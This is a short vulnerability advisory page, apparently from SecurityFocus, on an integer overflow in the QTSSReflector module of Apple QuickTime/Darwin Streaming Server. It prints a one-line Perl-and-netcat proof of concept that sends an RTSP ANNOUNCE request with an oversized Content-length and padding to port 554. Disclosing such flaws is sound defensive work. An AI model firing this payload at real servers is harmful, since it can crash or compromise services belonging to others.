Apple QuickTime/Darwin Streaming Server QTSSReflector Module Integer Overflow Vulnerability

The following proof of concept has been made available:

$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-length:4294967295\n\n","A"x8192' | nc -v localhost 554


 

Privacy Statement
Copyright 2010, SecurityFocus